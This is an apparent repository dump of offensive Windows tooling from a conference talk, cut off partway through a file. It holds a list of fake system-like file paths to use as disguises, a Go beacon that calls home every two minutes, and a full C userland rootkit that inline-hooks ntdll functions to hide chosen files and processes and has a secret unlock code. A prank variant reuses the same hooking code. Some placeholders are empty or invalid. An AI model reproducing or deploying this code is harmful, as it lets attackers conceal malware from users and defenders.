C:\ProgramData\Microsoft\Windows\Caches\licunse.exe 61 | C:\Windows\Provisioning\NL7Date0404.dll 62 | C:\Windows\System32\oobe\qdm.dll 63 | C:\Windows\WinSxS\odbcrrac.dll 64 | C:\Windows\SysWOW64\wbem\SismCore.exe 65 | C:\Windows\System32\Sysprep\scsipori.dll 66 | C:\Windows\SysWOW64\downlevel\CntrtextInslaller.dll 67 | C:\Program Files\Internet Explorer\ws2helc.exe 68 | C:\Windows\System32\oobe\PresyntationCore.exe 69 | C:\Windows\SysWOW64\AdvancedInstallers\ssctfp.dll 70 | C:\Windows\System32\migwiz\msctkmig.exe 71 | C:\Windows\System32\Com\IMEPADEM.exe 72 | C:\Windows\System32\InkEr.dll 73 | C:\Windows\SysWOW64\en\prnlpcl4.dll 74 | C:\Program Files\Common Files\System\ado\upbus.dll 75 | C:\Windows\dhcpcmonntor.exe 76 | C:\Windows\SysWOW64\wbem\wuls.exe 77 | C:\Program Files\Common Files\System\ado\AwWinRT.exe 78 | C:\Windows\System32\wbem\frofapi.dll 79 | C:\Windows\System32\oobe\KBDCT.dll 80 | C:\Windows\SysWOW64\downlevel\CntrtextMic.exe 
81 | C:\Windows\SysWOW64\Com\MiororDrvCompat.dll 82 | C:\Windows\System32\setup\mdminfft.exe 83 | C:\Windows\System32\migration\fsntsub.exe 84 | C:\Windows\apppatch\bootsts.dll 85 | C:\Windows\System32\AdvancedInstallers\KBDDO.dll 86 | C:\Windows\framsdynos.dll 87 | C:\Windows\SysWOW64\downlevel\KBDTT132.dll 88 | C:\Windows\System32\Sysprep\nuauclt.exe 89 | C:\Windows\System32\dot3fpui.dll 90 | C:\Windows\SysWOW64\migration\phflbmsg.exe 91 | C:\Windows\SysWOW64\downlevel\NlsLexicnns000d.dll 92 | C:\Windows\SysWOW64\Com\heframe.exe 93 | C:\Windows\System32\Boot\msdnm.dll 94 | C:\Program Files\Common Files\System\msadc\dcpromocmr.dll 95 | C:\Program Files\Internet Explorer\WofdpadFilter.dll 96 | C:\Program Files\Common Files\System\ado\MXHAgent.exe 97 | C:\Windows\SysWOW64\wbem\pnets.exe 98 | C:\Windows\mdmlis2u.exe 99 | C:\Program Files (x86)\Common Files\System\msadc\aiscore.exe 100 | C:\Windows\System32\systim.exe 101 | C:\Windows\SysWOW64\wbem\dmyskres2.dll 102 | C:\Program Files (x86)\Common Files\System\cposys.exe 103 | C:\Windows\SysWOW64\migration\dewiceaccess.exe 104 | C:\Windows\WinSxS\etorageutil.exe 105 | C:\Windows\SysWOW64\AdvancedInstallers\TNBJOP9S.dll 106 | C:\Windows\System32\WinSyncMetqstore.dll 107 | C:\Program Files\Common Files\System\ado\ipmiwrr.exe 108 | C:\Program Files (x86)\Common Files\System\msadc\KWDIT.dll 109 | C:\Windows\SysWOW64\en\rwinapi.exe 110 | C:\Windows\SysWOW64\migwiz\sspc.exe 111 | C:\Program Files (x86)\Common Files\System\msadc\hmiprop.dll 112 | C:\Windows\Microsoft.NET\mdmnis0u.exe 113 | C:\Program Files (x86)\Common Files\System\ado\ihwebsvc.exe 114 | C:\Windows\System32\imkomig.exe 115 | C:\Windows\System32\aormaliz.exe 116 | C:\Windows\SysWOW64\oobe\KBDXNMAL.exe 117 | C:\Windows\apppatch\yk63x24.dll 118 | C:\Windows\System32\Dism\mswtckrm.dll 119 | C:\Windows\SysWOW64\migwiz\luainsnall.dll 120 | C:\Program Files\Internet Explorer\cmigw.exe 121 | C:\Program Files (x86)\Common Files\System\msadc\wues2.exe 122 | 
C:\Windows\System32\downlevel\confect.dll 123 | C:\Windows\System32\qitsprx5.dll 124 | -------------------------------------------------------------------------------- /BSidesLV-2021/beacon.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "net" 5 | "os" 6 | "time" 7 | ) 8 | 9 | // beacon.go 10 | // Creates a beacon, duh. 11 | 12 | func main() { 13 | for { 14 | n, err := net.DialTimeout("tcp", ":", time.Second*5) 15 | if err != nil { 16 | println("err", err.Error()) 17 | return 18 | } 19 | n.Write([]byte("")) 20 | if n.Close(); len(os.Args) == 1 { 21 | break 22 | } 23 | time.Sleep(time.Minute * 2) 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /BSidesLV-2021/hooks/hook.c: -------------------------------------------------------------------------------- 1 | // Process/File Hook 2 | // Hides processes and files. 3 | // 4 | // Only tested on x64! 5 | 6 | // Windows Xp+ 7 | #define WINVER 0x0501 8 | #define _WIN32_WINNT 0x0501 9 | // Windows Vista+ 10 | // #define WINVER 0x0600 11 | // #define _WIN32_WINNT 0x0600 12 | 13 | #define NOCOMM 14 | #define WIN32_LEAN_AND_MEAN 15 | 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | #define SIZE_JUMP 5 22 | #define SIZE_PATCH 19 23 | #define SIZE_IGNORE 7 24 | 25 | #define HOOK_LOCK 133701 26 | #define HOOK_UNLOCK 133702 27 | 28 | #define EXPORT __declspec(dllexport) 29 | 30 | typedef struct hook { 31 | HANDLE mutex; 32 | LPVOID target; 33 | unsigned char orig[SIZE_JUMP]; 34 | unsigned char patch[SIZE_JUMP]; 35 | } hook; 36 | typedef long long ptr; 37 | 38 | HANDLE mutexGlobal; 39 | 40 | // ** ADDED VIA SCRIPTS ** // 41 | #define KEY_SIZE 0 42 | #define LIST_SIZE 0 43 | #define EXEC_SIZE 0 44 | 45 | int[] dataSize = {}; 46 | 47 | // data is an array that contains a list of 48 | // strings. Files first, than processes. 
49 | const char *data[] = {}; 50 | // ** END ** // 51 | 52 | // path in memory to jump to our code. 53 | unsigned char jump[SIZE_PATCH] = { 54 | 0x90, // nop 55 | 0x4C, 0x8B, 0xD0, // mv r10,rax 56 | 0x48, 0xB8, 0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7, 0xA8, // mv rax, 57 | 0x50, // push rax 58 | 0x49, 0x8B, 0xC2, // mv rax,r10 59 | 0xC3, // ret 60 | }; 61 | 62 | // These procs do NOT handle hooks very well. 63 | // Let's avoid them crashing. 64 | const char *ignored[SIZE_IGNORE] = { 65 | "DLLHost.exe\0", 66 | "LogonUI.exe\0", 67 | "regedit.exe\0", 68 | "consent.exe\0", 69 | "rundll32.exe\0", 70 | "werfault.exe\0", 71 | "taskhostex.exe\0", 72 | }; 73 | 74 | // ** HOOKS ** 75 | hook QueryDir; 76 | hook OpenFileNT; 77 | hook ProcVersion; 78 | hook CreateFileNT; 79 | hook QuerySystemInfo; 80 | // ** END ** 81 | 82 | NTSYSCALLAPI NTSTATUS NTAPI NtQueryDirectoryFile( 83 | IN HANDLE FileHandle, 84 | IN HANDLE Event OPTIONAL, 85 | IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, 86 | IN PVOID ApcContext OPTIONAL, 87 | OUT PIO_STATUS_BLOCK IoStatusBlock, 88 | OUT PVOID FileInformation, 89 | IN ULONG Length, 90 | IN FILE_INFORMATION_CLASS FileInformationClass, 91 | IN BOOLEAN ReturnSingleEntry, 92 | IN PUNICODE_STRING FileName OPTIONAL, 93 | IN BOOLEAN RestartScan 94 | ); 95 | 96 | EXPORT DWORD WINAPI GetVersionFunc(DWORD); 97 | 98 | EXPORT NTSTATUS WINAPI QuerySystemInfoFunc(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG); 99 | EXPORT NTSTATUS WINAPI OpenFileNTFunc(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PIO_STATUS_BLOCK, ULONG, ULONG); 100 | EXPORT NTSTATUS WINAPI CreateFileNTFunc(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PIO_STATUS_BLOCK, PLARGE_INTEGER, ULONG, ULONG, ULONG, ULONG, PVOID, ULONG); 101 | EXPORT NTSTATUS WINAPI QueryDirFunc(HANDLE, HANDLE, PIO_APC_ROUTINE, PVOID, PIO_STATUS_BLOCK, PVOID, ULONG, FILE_INFORMATION_CLASS, BOOLEAN, PUNICODE_STRING, BOOLEAN); 102 | 103 | // Find returns an empty memory space (INT3 or NOPS) in the specified module within a 32bit 104 | 
// address zone +/- of the pointer base. Returns 0 if the specified empty size cannot be found. 105 | ptr Find(int size, ptr module, ptr func) { 106 | SIZE_T n; 107 | int c = 0; 108 | unsigned char b[1024]; 109 | for (ptr x = module; x < func+65535; x += 1024) { 110 | if (ReadProcessMemory(GetCurrentProcess(), (LPVOID)x, b, 1024, &n) == 0) { 111 | return 0; 112 | } 113 | for (int i = 0; i < n; i++) { 114 | if (b[i] == 0x90 || b[i] == 0xCC) { 115 | if (c >= size+1) { 116 | return x+i-size; 117 | } 118 | c++; 119 | continue; 120 | } 121 | c = 0; 122 | } 123 | } 124 | return 0; 125 | } 126 | 127 | // Redo will reapply the JMP and unlock the hook mutex. 128 | void Redo(hook *h) { 129 | SIZE_T n; 130 | WriteProcessMemory(GetCurrentProcess(), h->target, h->patch, SIZE_JUMP, &n); 131 | ReleaseMutex(h->mutex); 132 | } 133 | // Undo will remove the hook JMP and will lock the hook mutex to prevent desync'd usage of the hook. 134 | void Undo(hook *h) { 135 | if (h->mutex == NULL || h->target == 0) { 136 | return; 137 | } 138 | WaitForSingleObject(h->mutex, INFINITE); 139 | SIZE_T n; 140 | WriteProcessMemory(GetCurrentProcess(), h->target, h->orig, SIZE_JUMP, &n); 141 | } 142 | // Hook will hook a function based on the provied handle, function pointer and replacement function. 143 | // The first argument is a pointer to a hook anchor. 144 | void Hook(hook *h, HANDLE mod, FARPROC func, ptr replacement) { 145 | if (mod == NULL || func == NULL || replacement == 0) { 146 | return; 147 | } 148 | ptr b = Find(SIZE_PATCH, (ptr)mod, (ptr)func); 149 | if (b == 0) { 150 | return; 151 | } 152 | SIZE_T n; 153 | h->target = (LPVOID)func; 154 | DWORD p; 155 | VirtualProtect(h->target, SIZE_JUMP, PAGE_EXECUTE_READWRITE, &p); 156 | if (ReadProcessMemory(GetCurrentProcess(), h->target, h->orig, SIZE_JUMP, &n) == 0 || n != SIZE_JUMP) { 157 | return; 158 | } 159 | if (h->orig[0] == 0xE9) { 160 | // Already hooked? 
161 | h->target = 0; 162 | return; 163 | } 164 | WaitForSingleObject(mutexGlobal, INFINITE); 165 | jump[13] = (replacement >> 56) & 0xFF; 166 | jump[12] = (replacement >> 48) & 0xFF; 167 | jump[11] = (replacement >> 40) & 0xFF; 168 | jump[10] = (replacement >> 32) & 0xFF; 169 | jump[9] = (replacement >> 24) & 0xFF; 170 | jump[8] = (replacement >> 16) & 0xFF; 171 | jump[7] = (replacement >> 8) & 0xFF; 172 | jump[6] = replacement & 0xFF; 173 | VirtualProtect((LPVOID)b, SIZE_PATCH, PAGE_EXECUTE_READWRITE, &p); 174 | if (WriteProcessMemory(GetCurrentProcess(), (LPVOID)b, jump, SIZE_PATCH, &n) == 0 || n != SIZE_PATCH) { 175 | ReleaseMutex(mutexGlobal); 176 | return; 177 | } 178 | ptr d = (b - 4) - (ptr)func; 179 | h->patch[4] = (d >> 24) & 0xFF; 180 | h->patch[3] = (d >> 16) & 0xFF; 181 | h->patch[2] = (d >> 8) & 0xFF; 182 | h->patch[1] = d & 0xFF; 183 | h->patch[0] = 0xE9; 184 | DWORD r = WriteProcessMemory(GetCurrentProcess(), h->target, h->patch, SIZE_JUMP, &n); 185 | ReleaseMutex(mutexGlobal); 186 | if (r == 0 || n != SIZE_JUMP) { 187 | return; 188 | } 189 | h->mutex = CreateMutex(NULL, FALSE, NULL); 190 | } 191 | 192 | #ifdef XOR 193 | // Xor can be used to decrypt the names contained 194 | void Xor(unsigned char* key, int key_size, unsigned char* data, int data_size) { 195 | if (key_size <= 0 || data_size <= 0) { 196 | return; 197 | } 198 | DWORD o; 199 | VirtualProtect(data, data_size+1, PAGE_READWRITE, &o); 200 | for (int i = 0; i < data_size; i++) { 201 | data[i] = data[i] ^ key[i % key_size]; 202 | } 203 | VirtualProtect(data, data_size+1, PAGE_READONLY, &o); 204 | } 205 | #endif 206 | 207 | int IndexOf(WCHAR *src, int src_len, const char *find, int find_len) { 208 | if (find_len > src_len) { 209 | return -1; 210 | } 211 | int f = find_len - 1, t = find_len - 1; 212 | for (int x = src_len - 1; x >= 0; x--) { 213 | if (src[x] == 0) { 214 | continue; 215 | } 216 | if (src[x] == find[f]) { 217 | f--; 218 | } else if (src[x] > 96 && find[f]+32 == src[x]) { 219 | 
f--; 220 | } else if (find[f] > 96 && src[x]+32 == find[f]) { 221 | f--; 222 | } else { 223 | if (f < t) { 224 | x++; 225 | } 226 | f = t; 227 | } 228 | if (f < 0) { 229 | return src_len-(src_len-x); 230 | } 231 | if (f == t && x < find_len) { 232 | return -1; 233 | } 234 | } 235 | return -1; 236 | } 237 | 238 | BOOL Ignore(WCHAR *src, int src_len) { 239 | for (int i = 0; i < SIZE_IGNORE; i++) { 240 | if (IndexOf(src, src_len, ignored[i], strlen(ignored[i])) != -1) { 241 | return TRUE; 242 | } 243 | } 244 | return FALSE; 245 | } 246 | BOOL HideFile(WCHAR *src, int src_len) { 247 | for (int i = EXEC_SIZE; i < LIST_SIZE; i++) { 248 | if (IndexOf(src, src_len, data[i], dataSize[i]) != -1) { 249 | return TRUE; 250 | } 251 | } 252 | return FALSE; 253 | } 254 | BOOL HideProcess(WCHAR *src, int src_len) { 255 | if (src_len == 0) { 256 | return FALSE; 257 | } 258 | for (int i = 0; i < EXEC_SIZE; i++) { 259 | if (IndexOf(src, src_len, data[i], dataSize[i]) != -1) { 260 | return TRUE; 261 | } 262 | } 263 | return FALSE; 264 | } 265 | 266 | EXPORT BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID args) { 267 | if (r == DLL_PROCESS_ATTACH) { 268 | // Check the file name to see if we should bail out. 269 | // Don't dynamically allocate this. It breaks things. 270 | WCHAR s[256]; 271 | int n = GetModuleFileNameW(NULL, (LPWSTR)s, MAX_PATH); 272 | if (n > 0 && Ignore(s, n)) { 273 | return TRUE; 274 | } 275 | HANDLE a = LoadLibraryW(L"ntdll.dll"); 276 | HANDLE b = LoadLibraryW(L"kernel32.dll"); 277 | // Hide Files 278 | Hook(&OpenFileNT, a, GetProcAddress(a, "NtOpenFile"), (ptr)&OpenFileNTFunc); 279 | Hook(&CreateFileNT, a, GetProcAddress(a, "NtCreateFile"), (ptr)&CreateFileNTFunc); 280 | // Unhook 281 | Hook(&ProcVersion, b, GetProcAddress(b, "GetProcessVersion"), (ptr)&GetVersionFunc); 282 | #ifdef XOR 283 | for (int i = 0; i < LIST_SIZE; i++) { 284 | Xor(data, KEY_SIZE, data[i], dataSize[i]); 285 | } 286 | #endif 287 | // Avoid Explorer, as it doesn't like the last two. 
288 | if (n > 0 && IndexOf(s, n, "explorer.exe\0", 12) == -1) { 289 | return TRUE; 290 | } 291 | // Avoid Task Manager as it causes problems. 292 | if (n > 0 && IndexOf(s, n, "taskmgr.exe\0", 11) == -1) { 293 | Hook(&QueryDir, a, GetProcAddress(a, "NtQueryDirectoryFile"), (ptr)&QueryDirFunc); 294 | } 295 | // Hide Processes 296 | Hook(&QuerySystemInfo, a, GetProcAddress(a, "NtQuerySystemInformation"), (ptr)&QuerySystemInfoFunc); 297 | } else if (r == DLL_PROCESS_DETACH) { 298 | Undo(&QueryDir); 299 | Undo(&OpenFileNT); 300 | Undo(&ProcVersion); 301 | Undo(&CreateFileNT); 302 | Undo(&QuerySystemInfo); 303 | } 304 | return TRUE; 305 | } 306 | 307 | EXPORT DWORD WINAPI GetVersionFunc(DWORD pid) { 308 | // Do we have the special number? Unlock hooks. 309 | if (pid == HOOK_UNLOCK) { 310 | Undo(&QueryDir); 311 | Undo(&OpenFileNT); 312 | Undo(&CreateFileNT); 313 | Undo(&QuerySystemInfo); 314 | return 0; 315 | } 316 | // Do we have the special number? Re-lock hooks. 317 | if (pid == HOOK_LOCK) { 318 | Redo(&QueryDir); 319 | Redo(&OpenFileNT); 320 | Redo(&CreateFileNT); 321 | Redo(&QuerySystemInfo); 322 | return 0; 323 | } 324 | // Standard operations. 325 | Undo(&ProcVersion); 326 | DWORD r = GetProcessVersion(pid); 327 | Redo(&ProcVersion); 328 | return r; 329 | } 330 | 331 | EXPORT NTSTATUS WINAPI QuerySystemInfoFunc(SYSTEM_INFORMATION_CLASS class, PVOID info, ULONG size, PULONG ret) { 332 | Undo(&QuerySystemInfo); 333 | NTSTATUS r = NtQuerySystemInformation(class, info, size, ret); 334 | Redo(&QuerySystemInfo); 335 | // Ignore errors or things we don't care about. 
336 | if (size == 0 || r != 0x00000000 || class != SystemProcessInformation) { 337 | return r; 338 | } 339 | PSYSTEM_PROCESS_INFORMATION n = (PSYSTEM_PROCESS_INFORMATION)info; 340 | if (n->NextEntryOffset == 0) { 341 | return r; 342 | } 343 | DWORD p = GetCurrentProcessId(); 344 | PSYSTEM_PROCESS_INFORMATION c = NULL; 345 | while (n->NextEntryOffset != 0) { 346 | c = (PSYSTEM_PROCESS_INFORMATION)((PUCHAR)n+n->NextEntryOffset); 347 | // Do not hide processes if it's the calling PID. 348 | // Causes powershell to crash. 349 | if ((DWORD)(c->UniqueProcessId) == p || !HideProcess(c->ImageName.Buffer, c->ImageName.Length)) { 350 | n = c; 351 | continue; 352 | } 353 | // Skip process. 354 | if (c->NextEntryOffset == 0) { 355 | n->NextEntryOffset = 0; 356 | } 357 | n->NextEntryOffset += c->NextEntryOffset; 358 | } 359 | return r; 360 | } 361 | EXPORT NTSTATUS WINAPI OpenFileNTFunc(PHANDLE hdl, ACCESS_MASK da, POBJECT_ATTRIBUTES oa, PIO_STATUS_BLOCK isb, ULONG sa, ULONG oo) { 362 | // If we hide it, return ACCESS_DENIED. 363 | if (HideFile(oa->ObjectName->Buffer, oa->ObjectName->Length)) { 364 | return 0xC000000F; 365 | } 366 | Undo(&OpenFileNT); 367 | NTSTATUS r = NtOpenFile(hdl, da, oa, isb, sa, oo); 368 | Redo(&OpenFileNT); 369 | return r; 370 | } 371 | EXPORT NTSTATUS WINAPI CreateFileNTFunc(PHANDLE hdl, ACCESS_MASK da, POBJECT_ATTRIBUTES oa, PIO_STATUS_BLOCK isb, PLARGE_INTEGER as, ULONG fa, ULONG sa, ULONG cd, ULONG co, PVOID eab, ULONG eas) { 372 | // If we hide it, return ACCESS_DENIED. 
373 | if (HideFile(oa->ObjectName->Buffer, oa->ObjectName->Length)) { 374 | return 0xC000000F; 375 | } 376 | Undo(&CreateFileNT); 377 | NTSTATUS r = NtCreateFile(hdl, da, oa, isb, as, fa, sa, cd, co, eab, eas); 378 | Redo(&CreateFileNT); 379 | return r; 380 | } 381 | EXPORT NTSTATUS WINAPI QueryDirFunc(HANDLE hdl, HANDLE e, PIO_APC_ROUTINE apcr, PVOID apcc, PIO_STATUS_BLOCK isb, PVOID info, ULONG size, FILE_INFORMATION_CLASS class, BOOLEAN rse, PUNICODE_STRING fn, BOOLEAN rs) { 382 | Undo(&QueryDir); 383 | NTSTATUS r = NtQueryDirectoryFile(hdl, e, apcr, apcc, isb, info, size, class, rse, fn, rs); 384 | Redo(&QueryDir); 385 | // Ignore errors or things we don't care about. 386 | if (size == 0 || (r != 0x00000000 && r != 0x80000006)) { 387 | return r; 388 | } 389 | if (class == FileDirectoryInformation) { 390 | PFILE_DIRECTORY_INFORMATION n = (PFILE_DIRECTORY_INFORMATION)info; 391 | if (n->NextEntryOffset == 0) { 392 | return r; 393 | } 394 | // Single File, return ACCESS_DENIED 395 | if (isb->Information == 0 && HideFile(n->FileName, n->FileNameLength)) { 396 | return 0xC000000F; 397 | } 398 | PFILE_DIRECTORY_INFORMATION c = NULL; 399 | while (n->NextEntryOffset != 0) { 400 | c = (PFILE_DIRECTORY_INFORMATION)((PUCHAR)n+n->NextEntryOffset); 401 | if (!HideFile(c->FileName, c->FileNameLength)) { 402 | n = c; 403 | continue; 404 | } 405 | // Skip file. 
406 | if (c->NextEntryOffset == 0) { 407 | n->NextEntryOffset = 0; 408 | } 409 | n->NextEntryOffset += c->NextEntryOffset; 410 | } 411 | } 412 | if (class == FileFullDirectoryInformation) { 413 | PFILE_FULL_DIR_INFORMATION n = (PFILE_FULL_DIR_INFORMATION)info; 414 | if (n->NextEntryOffset == 0) { 415 | return r; 416 | } 417 | // Single File, return ACCESS_DENIED 418 | if (isb->Information == 0 && HideFile(n->FileName, n->FileNameLength)) { 419 | return 0xC000000F; 420 | } 421 | PFILE_FULL_DIR_INFORMATION c = NULL; 422 | while (isb->Information != 0 && n->NextEntryOffset != 0) { 423 | c = (PFILE_FULL_DIR_INFORMATION)((PUCHAR)n+n->NextEntryOffset); 424 | if (!HideFile(c->FileName, c->FileNameLength)) { 425 | n = c; 426 | continue; 427 | } 428 | // Skip file. 429 | if (c->NextEntryOffset == 0) { 430 | n->NextEntryOffset = 0; 431 | } 432 | n->NextEntryOffset += c->NextEntryOffset; 433 | } 434 | } 435 | if (class == FileBothDirectoryInformation) { 436 | PFILE_BOTH_DIR_INFORMATION n = (PFILE_BOTH_DIR_INFORMATION)info; 437 | if (n->NextEntryOffset == 0) { 438 | return r; 439 | } 440 | // Single File, return ACCESS_DENIED 441 | if (isb->Information == 0 && HideFile(n->FileName, n->FileNameLength)) { 442 | return 0xC000000F; 443 | } 444 | PFILE_BOTH_DIR_INFORMATION c = NULL; 445 | while (n->NextEntryOffset != 0) { 446 | c = (PFILE_BOTH_DIR_INFORMATION)((PUCHAR)n+n->NextEntryOffset); 447 | if (!HideFile(c->FileName, c->FileNameLength)) { 448 | n = c; 449 | continue; 450 | } 451 | // Skip file. 452 | if (c->NextEntryOffset == 0) { 453 | n->NextEntryOffset = 0; 454 | } 455 | n->NextEntryOffset += c->NextEntryOffset; 456 | } 457 | } 458 | return r; 459 | } 460 | -------------------------------------------------------------------------------- /BSidesLV-2021/hooks/hook_rickroll.c: -------------------------------------------------------------------------------- 1 | // RickRoll Hook 2 | // Renames all processes to your favorite song. 3 | // 4 | // Only tested on x64! 

#define WINVER 0x0501
#define _WIN32_WINNT 0x0501

#define NOCOMM
#define WIN32_LEAN_AND_MEAN

// NOTE(review): the four header names were lost in extraction; the page shows
// only the bare directives, so they are left as found here.
#include
#include
#include
#include

// Sizes of the code written into the hooked module (see Hook()).
#define SIZE_JUMP 5    // E9 rel32: the 5-byte JMP written over the target's first bytes
#define SIZE_PATCH 19  // length of the 'jump' trampoline below
#define SIZE_IGNORE 7  // number of entries in 'ignored'
#define SIZE_LYRICS 34 // number of entries in 'lyrics'

#define EXPORT __declspec(dllexport)

// One hooked export. Filled in by Hook(); Undo()/Redo() flip the target between
// 'orig' and 'patch' around each pass-through call to the real function.
typedef struct hook {
    HANDLE mutex;                   // per-hook mutex: acquired in Undo(), released in Redo(); created as the last step of Hook()
    LPVOID target;                  // address of the hooked export; 0 means "not hooked"
    unsigned char orig[SIZE_JUMP];  // the target's first SIZE_JUMP bytes, read before patching
    unsigned char patch[SIZE_JUMP]; // the E9 rel32 JMP that replaces them
} hook;
// Integer wide enough to carry an x64 address (this file is x64-only, see the header).
typedef long long ptr;

// Serialises the write phase of Hook().
// NOTE(review): nothing visible in this file creates mutexGlobal; if it stays
// NULL, WaitForSingleObject() fails immediately and the lock is a no-op.
HANDLE mutexGlobal;

// Trampoline written by Hook() into INT3/NOP padding of the target module located
// by Find(). Bytes 6..13 (the 0xA1..0xA8 placeholders) are overwritten at hook
// time with the little-endian address of the replacement function.
// Together with the E9 JMP at the export's entry and the PAGE_EXECUTE_READWRITE
// protection Hook() applies, these bytes are the in-memory artifacts of the hook.
unsigned char jump[SIZE_PATCH] = {
    0x90,                                                       // nop
    0x4C, 0x8B, 0xD0,                                           // mov r10, rax
    0x48, 0xB8, 0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7, 0xA8, // mov rax, <replacement address>
    0x50,                                                       // push rax
    0x49, 0x8B, 0xC2,                                           // mov rax, r10
    0xC3,                                                       // ret (transfers to the pushed address)
};

// These procs do NOT handle hooks very well.
// Let's avoid them crashing.
// Image names that DllMain() compares (ASCII case-insensitively, via Ignore()/IndexOf())
// against the end of the current module path before installing the hook.
// The explicit "\0" is redundant: a C string literal is already NUL-terminated.
const char *ignored[SIZE_IGNORE] = {
    "DLLHost.exe\0",
    "LogonUI.exe\0",
    "regedit.exe\0",
    "consent.exe\0",
    "rundll32.exe\0",
    "werfault.exe\0",
    "taskhostex.exe\0"
};

// Replacement image names; QuerySystemInfoFunc() applies them in order and wraps
// around after SIZE_LYRICS entries.
const wchar_t *lyrics[SIZE_LYRICS] = {
    L"Never ", L"gonna ", L"give ", L"you ", L"up ",
    L"Never ", L"gonna ", L"let ", L"you ", L"down ",
    L"Never ", L"gonna ", L"run ", L"around ", L"and ", L"desert ", L"you ",
    L"Never ", L"gonna ", L"make ", L"you ", L"cry ",
    L"Never ", L"gonna ", L"say ", L"goodbye ",
    L"Never ", L"gonna ", L"tell ", L"a ", L"lie ", L"and ", L"hurt ", L"you "
};

// ** HOOKS **
hook QuerySystemInfo; // anchor for the NtQuerySystemInformation hook installed in DllMain()
// ** END **

// Replacement installed for NtQuerySystemInformation; defined further down.
EXPORT NTSTATUS WINAPI QuerySystemInfoFunc(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG);

// Find returns an empty memory space (INT3 or NOPS) in the specified module within a 32bit
// address zone +/- of the pointer base. Returns 0 if the specified empty size cannot be found.
73 | ptr Find(int size, ptr module, ptr func) { 74 | SIZE_T n; 75 | int c = 0; 76 | unsigned char b[1024]; 77 | for (ptr x = module; x < func+65535; x += 1024) { 78 | if (ReadProcessMemory(GetCurrentProcess(), (LPVOID)x, b, 1024, &n) == 0) { 79 | return 0; 80 | } 81 | for (int i = 0; i < n; i++) { 82 | if (b[i] == 0x90 || b[i] == 0xCC) { 83 | if (c >= size+1) { 84 | return x+i-size; 85 | } 86 | c++; 87 | continue; 88 | } 89 | c = 0; 90 | } 91 | } 92 | return 0; 93 | } 94 | 95 | // Redo will reapply the JMP and unlock the hook mutex. 96 | void Redo(hook *h) { 97 | SIZE_T n; 98 | WriteProcessMemory(GetCurrentProcess(), h->target, h->patch, SIZE_JUMP, &n); 99 | ReleaseMutex(h->mutex); 100 | } 101 | // Undo will remove the hook JMP and will lock the hook mutex to prevent desync'd usage of the hook. 102 | void Undo(hook *h) { 103 | if (h->mutex == NULL || h->target == 0) { 104 | return; 105 | } 106 | WaitForSingleObject(h->mutex, INFINITE); 107 | SIZE_T n; 108 | WriteProcessMemory(GetCurrentProcess(), h->target, h->orig, SIZE_JUMP, &n); 109 | } 110 | // Hook will hook a function based on the provied handle, function pointer and replacement function. 111 | // The first argument is a pointer to a hook anchor. 112 | void Hook(hook *h, HANDLE mod, FARPROC func, ptr replacement) { 113 | if (mod == NULL || func == NULL || replacement == 0) { 114 | return; 115 | } 116 | ptr b = Find(SIZE_PATCH, (ptr)mod, (ptr)func); 117 | if (b == 0) { 118 | return; 119 | } 120 | SIZE_T n; 121 | h->target = (LPVOID)func; 122 | DWORD p; 123 | VirtualProtect(h->target, SIZE_JUMP, PAGE_EXECUTE_READWRITE, &p); 124 | if (ReadProcessMemory(GetCurrentProcess(), h->target, h->orig, SIZE_JUMP, &n) == 0 || n != SIZE_JUMP) { 125 | return; 126 | } 127 | if (h->orig[0] == 0xE9) { 128 | // Already hooked? 
129 | h->target = 0; 130 | return; 131 | } 132 | WaitForSingleObject(mutexGlobal, INFINITE); 133 | jump[13] = (replacement >> 56) & 0xFF; 134 | jump[12] = (replacement >> 48) & 0xFF; 135 | jump[11] = (replacement >> 40) & 0xFF; 136 | jump[10] = (replacement >> 32) & 0xFF; 137 | jump[9] = (replacement >> 24) & 0xFF; 138 | jump[8] = (replacement >> 16) & 0xFF; 139 | jump[7] = (replacement >> 8) & 0xFF; 140 | jump[6] = replacement & 0xFF; 141 | VirtualProtect((LPVOID)b, SIZE_PATCH, PAGE_EXECUTE_READWRITE, &p); 142 | if (WriteProcessMemory(GetCurrentProcess(), (LPVOID)b, jump, SIZE_PATCH, &n) == 0 || n != SIZE_PATCH) { 143 | ReleaseMutex(mutexGlobal); 144 | return; 145 | } 146 | ptr d = (b - 4) - (ptr)func; 147 | h->patch[4] = (d >> 24) & 0xFF; 148 | h->patch[3] = (d >> 16) & 0xFF; 149 | h->patch[2] = (d >> 8) & 0xFF; 150 | h->patch[1] = d & 0xFF; 151 | h->patch[0] = 0xE9; 152 | DWORD r = WriteProcessMemory(GetCurrentProcess(), h->target, h->patch, SIZE_JUMP, &n); 153 | ReleaseMutex(mutexGlobal); 154 | if (r == 0 || n != SIZE_JUMP) { 155 | return; 156 | } 157 | h->mutex = CreateMutex(NULL, FALSE, NULL); 158 | } 159 | 160 | int IndexOf(WCHAR *src, int src_len, const char *find, int find_len) { 161 | if (find_len > src_len) { 162 | return -1; 163 | } 164 | int f = find_len - 1, t = find_len - 1; 165 | for (int x = src_len - 1; x >= 0; x--) { 166 | if (src[x] == 0) { 167 | continue; 168 | } 169 | if (src[x] == find[f]) { 170 | f--; 171 | } else if (src[x] > 96 && find[f]+32 == src[x]) { 172 | f--; 173 | } else if (find[f] > 96 && src[x]+32 == find[f]) { 174 | f--; 175 | } else { 176 | if (f < t) { 177 | x++; 178 | } 179 | f = t; 180 | } 181 | if (f < 0) { 182 | return src_len-(src_len-x); 183 | } 184 | if (f == t && x < find_len) { 185 | return -1; 186 | } 187 | } 188 | return -1; 189 | } 190 | 191 | BOOL Ignore(WCHAR *src, int src_len) { 192 | for (int i = 0; i < SIZE_IGNORE; i++) { 193 | if (IndexOf(src, src_len, ignored[i], strlen(ignored[i])) != -1) { 194 | return 
